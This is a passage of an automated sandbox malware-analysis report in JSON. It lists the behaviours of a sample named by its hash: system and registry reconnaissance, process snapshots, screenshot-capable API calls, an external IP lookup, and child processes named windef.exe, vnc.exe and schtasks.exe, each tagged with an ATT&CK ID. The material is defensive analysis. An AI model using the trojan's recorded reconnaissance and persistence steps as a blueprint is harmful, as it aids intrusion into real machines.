1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009700f83b0000ff07000000008f000830be007f0700000830be00302f8f00223f000098d59f0267e5207700008f00e07e97000000000000008f0000000000e07e970000000000ce3e00f080000000888197000830be0068a09600003b000000008f0000000000e07e97008064000000008f00d87b9700f83b0000ff07000000008f000830be007f0700000830be007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360087e2d99428d69f026d82f876f47a970004010000 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009700f83b0000ff07000000008f000830be007f0700000830be00302f8f00fc3e000098d59f0267e5207700008f00108097000000000000008f00000000001080970000000000a83e009680000000b88297000830be0068a09600003b000000008f0000000000108097008064000000008f00087d9700f83b0000ff07000000008f000830be007f0700000830be007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360087e2d99428d69f026d82f876247c970004010000 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009700f83b0000ff07000000008f000830be007f0700000830be00302f8f00d63e000098d59f0267e5207700008f00408197000000000000008f00000000004081970000000000823e00bc80000000e88397000830be0068a09600003b000000008f0000000000408197008064000000008f00387e9700f83b0000ff07000000008f000830be007f0700000830be007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360087e2d99428d69f026d82f8764c7d970004010000 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009700f83b0000ff07000000008f000830be007f0700000830be00302f8f00b13e000098d59f0267e5207700008f00688297000000000000008f000000000068829700000000005d3e006380000000108597000830be0068a09600003b000000008f0000000000688297008064000000008f00607f9700f83b0000ff07000000008f000830be007f0700000830be007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360087e2d99428d69f026d82f876847e970004010000 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000005085950068df9f02b344196a81d0187600000000000000000000000000000000000000000000000004020000000000000000000000000000ccedd99447eaf89424e49f025ecb16760402000000000000005d147680e69f020e5d147618e29f02dcaa1876010000000000000072000000ffffffffffffffffa0df9f02780200000000000025000000a0df9f027b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360057ebd994f8df9f026d82f876cca3970004010000 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000ffff20009c001baf1a26620b167600000000606f8f00000000005000000014a6970002000000d82db0000000000001000008a002970088738f00380b16762cde9f0202000000e0de9f023f08627502000000d82db000000000000100001888fb6175d0de9f02c81c1876a6e09f0295fb617504e09f02d82db0000000000000000000000000008cdf9f0200008f007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600a3ebd9944cdf9f026d82f876cca3970004010000 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cbecd99464d89f026d82f876eca8970004010000 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ff2b2377c2dcbb753ce99f02cc018f0000008f0000000000000000000d008501e7030000000000000000000000000000180000000e007c01e7030000f8f99e02dce89f02a0e89f02000000008e000000f0e89f02feffffff78e89f02cf002477d6002477cadcbb758e00000047000000f0e89f02000000004ce89f0295e11f77 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000008f00c0059800000000003e00003e340000c0e807980078429800d8bd9700f001000000008f0004000000c00598009cea9f020464237738018f00e06323772edebb750000000000008f00c80598006dd161751dbdbe946caed9750000000000000000d8be997578429800302f8f000100000000008f0050018f000c000000c8059800302f8f000200000218000000b0260096820000000000000000000000030000003cea9f02820000007f070000000000006fe3088402000000c07569750830be0000000000c075697558ea9f0240308f0000000000302f8f00b0ea9f02ff2b2377 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000008f000e000000aa000000000000000000000028919600506c8f00b86d8f0090b4980068788f006e00630028db9f027800650030e89f0290b49800e9e9237790b4980000000000aa00000054dc9f028ce09f020000000000000000000000000000000000000000000000008064000000008f001c5c227760d83975ffffffff1700000004dc9f022400000003000000f4e09f0220e69f028ce09f028600000030dc9f0296ed2377b2b49800a06af9748600000054dc9f028ce09f020000000086008800a06af97454dc9f02916cf974b2b49800a06af974a06af974c4e09f0202020000 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-152", "type": 6, "relevance": 3, "name": "Calls an API typically used to enumerate active windows", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"EnumWindows\" with parameter \"2118912\" - (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\WINDEF.EXE\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\WINDEF.EXE\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SCHTASKS.EXE\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SCHTASKS.EXE\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\VNC.EXE\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\VNC.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-202", "type": 3, "relevance": 3, "name": "Reads system mouse configuration", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\MOUSE\";)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\MOUSE\";)", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"IsWow64Process\" with parameter \"5916\" - (UID: 00000000-00005916)\n \"vnc.exe\" called \"IsWow64Process\" with parameter \"5856\" - (UID: 00000000-00006112)\n \"svchost.exe\" called \"IsWow64Process\" with parameter \"5856\" - (UID: 00000000-00005856)\n \"windef.exe\" called \"IsWow64Process\" with parameter \"6132\" - (UID: 00000000-00006132)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"IsWow64Process\" with parameter \"6108\" - (UID: 00000000-00006108)\n \"schtasks.exe\" called \"IsWow64Process\" with parameter \"4040\" - (UID: 00000000-00004040)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")\n \"windef.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"windef.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LookupAccountSidA\" (UID: 00000000-00006108)\n \"schtasks.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00004040)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"windef.exe\" queries volume information of \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\windef.exe\" at 00000000-00006132-0000010C-2867391\n \"windef.exe\" queries volume information of \"C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.ServiceModel.Internals\\v4.0_4.0.0.0__31bf3856ad364e35\\System.ServiceModel.Internals.dll\" at 00000000-00006132-0000010C-104575626\n \"windef.exe\" queries volume information of \"C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.ServiceModel.Internals\\v4.0_4.0.0.0__31bf3856ad364e35\\System.ServiceModel.Internals.dll\" at 00000000-00006132-0000010C-104586709", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetLocalTime@KERNEL32.dll directly followed by \"cmp word ptr [esi], 0000h\" and \"je 00465775h\" at 60797-5458-004655FD", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"469830180\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"469830180\"\n \"cx\": \"16\"\n \"cy\": \"16\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindFirstFileW\" with parameter C:\\3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe:Zone.Identifier (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00005916)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"svchost.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"windef.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-62", "type": 7, "relevance": 1, "name": "Communicates with HTTP webserver (GET/POST requests)", "description": "Found http requests in header \"GET /json/\"", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "network-60", "type": 7, "relevance": 1, "name": "HTTP requests contain Base64 strings", "description": "Contains base64 string in header \"Keep\" in header \"GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive\"", "origin": "Network Traffic", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" opened \"\\Device\\KsecDD\"\n \"windef.exe\" opened \"\\Device\\KsecDD\"\n \"schtasks.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\CRYPT32\"; Key: \"DEBUGHEAPFLAGS\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "External Systems", "identifier": "suricata-4", "type": 18, "relevance": 3, "name": "Detected Suricata Alert - External IP Lookup", "description": "Detected alert \"ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)\" (SID: 2054141, Rev: 1, Severity: 2) categorized as \"Device Retrieving External IP Address Detected\"\n Detected alert \"ET INFO External IP Lookup ip-api.com\" (SID: 2022082, Rev: 6, Severity: 2) categorized as \"Device Retrieving External IP Address Detected\"", "origin": "Suricata Alerts", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" reads file \"C:\\Users\\%OSUSER%\\Searches\\desktop.ini\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" reads file \"C:\\Users\\%OSUSER%\\Videos\\desktop.ini\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" reads file \"C:\\Users\\%OSUSER%\\Pictures\\desktop.ini\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" reads file \"C:\\Users\\%OSUSER%\\Contacts\\desktop.ini\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" reads file \"C:\\Users\\%OSUSER%\\Favorites\\desktop.ini\"\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" reads file 